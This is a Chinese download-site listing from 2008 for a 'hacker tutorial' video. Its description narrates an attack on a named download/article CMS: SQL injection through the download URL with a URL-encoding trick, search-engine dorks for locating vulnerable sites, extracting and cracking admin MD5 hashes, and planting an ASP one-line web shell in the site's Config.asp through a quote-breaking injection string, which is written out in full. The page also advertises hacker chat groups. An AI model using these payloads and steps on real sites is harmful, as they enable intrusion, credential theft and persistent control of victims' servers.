下载月排行
立即下载浪人下载文章的0DAY漏洞利用
软件大小: | 16.4 MB |
---|---|
软件语言: | 简体中文 |
软件类别: | 黑客教学 - 黑客动画 |
授权方式: | 共享版 |
应用平台: | Win9X/2000/XP/2003/ |
更新时间: | 2008/8/18 13:41:28 |
开 发 商: | 暂无信息 |
联 系 人: | 暂无联系方式 |
分享收藏 | |
解压密码: | 本站默认解压密码:www.987654321sf.com |
推荐等级: | |
会员中心: | 【账号登录】 【账号注册】 开通VIP下载流程 |
查毒情况: |
[复制下载页面地址给QQ/MSN上的好友]软件介绍
今天做的动画是浪人下载和浪人文章的0DAY漏洞利用
其实也不是什么0DAY啦,就是一个注入漏洞
浪人:www.lre.cn
大家可以快进看
先随便点一个软件下载
官方都更新到2.4了,但是还是官方自己再用,不过也有漏洞哦
把下载地址复制到明小子里面,把I改成%69
看到了吗,没有改之前是不能注入额
恭喜,该URL可以注入!
数据库类型:Access数据库
下面来讲讲关键字的搜索
下载链接若长时间无响应,请稍候再试;无法下载或是其它问题,请给我留言.....就是这一句了
在BAIDU上搜搜看
百度一下,找到相关网页约6,030篇
再看看GOOGLE
网页 约有12,800项符合
看到了吧
下面正式进入正题,我就不打字了
大家仔细看
我在本机上测试的
Admin_Info
是管理员表
密码是MD5加密的,在WWW.CMD5.COM上可以解密
郁闷。。。。不知道为什么本机老跑不出来
反正我知道密码啦,下面开始拿webshell
如果你们猜的话一定可以猜出来的
本机猜出来了
有些后台是ADMIN.ASP
还有的是LOGIN.ASP
版本不同啦
后台有两种方法拿WEBSHELL
看我演示
OK,这是第一种
下面讲第二种
在网站配置信息里
插入一句话
不是光查
<%eval request("#")%>
这样是不行的
看演示
sss"%><%eval request("#")%><%ViewMessage="c
下载说明里面写上上面的一句话
我都已经写好了
http://localhost/down/Inc\Config.asp
这个是我一句话的地址
然后连接就可以了
88
邪恶领域[一]群
群号:8494875
邪恶领域[二]群
群号:5501649
补充一下
浪人文章也有一样的漏洞
88